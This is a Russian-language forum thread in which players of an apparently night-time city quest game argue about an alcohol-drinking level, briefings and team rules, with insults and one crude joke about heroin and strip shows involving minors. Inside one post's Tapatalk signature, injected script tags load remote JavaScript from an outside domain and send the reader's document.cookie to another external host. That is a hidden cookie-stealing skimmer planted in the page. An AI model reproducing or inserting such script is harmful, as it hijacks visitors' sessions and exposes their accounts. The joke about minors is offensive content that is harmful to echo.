![]() |
Цитата:
|
Отлично!!! Я придумал задание, найти на локе героин и несвежую еду, употребить все внутрь. Полчаса стоптайм с курениеб бонусных под стриптиз несовершеннолетних мальчиков и девочек а потом бегом 5 км, ну и там тебя менты принимают ) Код выдает агент =) Норм ?
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
|
3.9.1.
|
О_О
|
Цитата:
|
Наташа, убери ты алкоуровень, не дразни гусей. Я уверен, что игра от этого ничего не потеряет, зато не будет говна и вопросов про засуженые команды. Я понимаю, заставить на треху залезть. Типа - не можешь - иди спать, нечего тебе тут делать. Но когда команда за здоровый образ жизни, заставлять её пить или тащить в поле алкаша балластом - глупо и странно. А главное - в угоду чему? Мега перфак можно с яблочным соком провести, я уверен!
|
Мегаперфак можно даже с апельсином! ;)))
|
Цитата:
|
Цитата:
Наташа правильно написала, не хошь - не играй. не можешь - сливай. А то что она вроде с головой дружит, сомнений вроде нет ни у кого. |
Цитата:
|
Цитата:
|
Цитата:
|
Коллеги! Оставьте немного негатива на "после игры" :)
В глоссарии и в ответе Руслану вроде я все понятно написала. Повторю еще - не пьющие тоже могут пройти уровень без слива, возможно это будет труднее. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
ну да, много чего законно, вот гомосексуализм, например, законен. Давайте и такие уровни или игры делать, каждая команда пусть ищет себе в экипаж по представителю, ну а не нашли, так по сливу пройти можно или с трудностями)) это называется неравными условиями, если не ошибаюсь
|
какая трешота тут у вас :D
|
Цитата:
|
Цитата:
|
Коллеги! Повторю вопрос - утренний бриф делать там же где вечерний? Или ни кто машины не оставляет?
|
я за там же
|
Цитата:
|
Да алкашам похую. Где нажрутся - там и финиш)
|
Цитата:
|
Цитата:
|
Серьезно?? 3 страницы флуда??
:))) |
Не ссыте. Добегут.
|
Цитата:
|
Действительно! Куда лучше играть и делать игры для самих себя. И поочереди передавать знамя победителя. Ведь если играть в более серьезных проектах, то ничего не светит, а немного победы хочется всем...
|
Цитата:
|
Цитата:
Как по физухе, так и по головоломкам... |
Цитата:
|
Ах вот, Артурчик, от кого вся это хуита происходит... обидки, обидки;)
|
Вложений: 1
смех продливает жизнь - мне продлили сегодня на полдня.)))
Вложение 1050 |
Цитата:
Угар ))) |
)))) так перебор же вроде запрещен?
Отправлено с моего ThL W3 через Tapatalk <script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
|
Цитата:
Я делал игры в ДЛ1 и как инигруппа, и в составе Блондинок, и в составе Апстрима. В составе Блондинок мы были два сезона в тройке лидеров. На данный момент ДЛ1 мне не интересен совсем, хотя легко могу собрать экипаж. И уж не беспокойся. В хвосте тащится не буду несмотря на свой возраст. А у тебя как были комплексы, так они и остались. |
Наташа, сообщи плиз про бриф):rolleyes:
|
Да нет, Кирюша, я тебя и таких как ты ценю, без вас было бы скучно жить.
Ну и в качестве информации - может раскроешь для меня список тех, кого я ненавижу, а то я как-то и не в курсе.... |
ППО по брифу
|
млин, опять стриптиз у вокзала))):D ладно на парковке гипермаркета...
|
Цитата:
|
Цитата:
|
Цитата:
|
Знатно поржала. Всем спасибо.
|
Цитата:
Ну а в случае описанном ранее, у всех была возможность найти себе в экипаж представителя, и все были заранее оповещены. Тут главное чтоб этот "представитель" считался стаффом, и не приходилось заменять этим "представителем" другого члена экипажа) |
Эх подкину дровишек
А у нас же нет ни где в правилах что две команды не могут играть на одной машине?... |
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Собственно про слив инфы.
Цитата:
|
А если ни кто кому сливать ни чего не будет?
И бренды у нас разные.. Так что все норм. |
Цитата:
|
Поддерживаю Ящера! =)
А все что не доказано, не является произошедшим. |
Просьба все команды на брифинг вместе с деньгами передать организаторам бумажку формата не менее А8 с наименованием команды и контактными данными капитана.
|
Мы не играем =(
|
бумажек нет?
|
Цитата:
|
Вань, я договорился, Наташа перепилила зону игры, теперь все задания по пути из С-Пб в Вологду.
|
Цитата:
|
Цитата:
|
Цитата:
|
Покажем немощным вологодцам суровый петербургский дедлайн. После скольких стаканов они там начнут падать?
|
4 часа время лидера?!!
давненько я не оказывался дома в 8 утра после одноэкипажечки)) спасибо за игру! |
Сдается мне, что Сгу нас где то "обманула" относительно игры))
|
Часовой пояс GMT +3, время: 19:46. |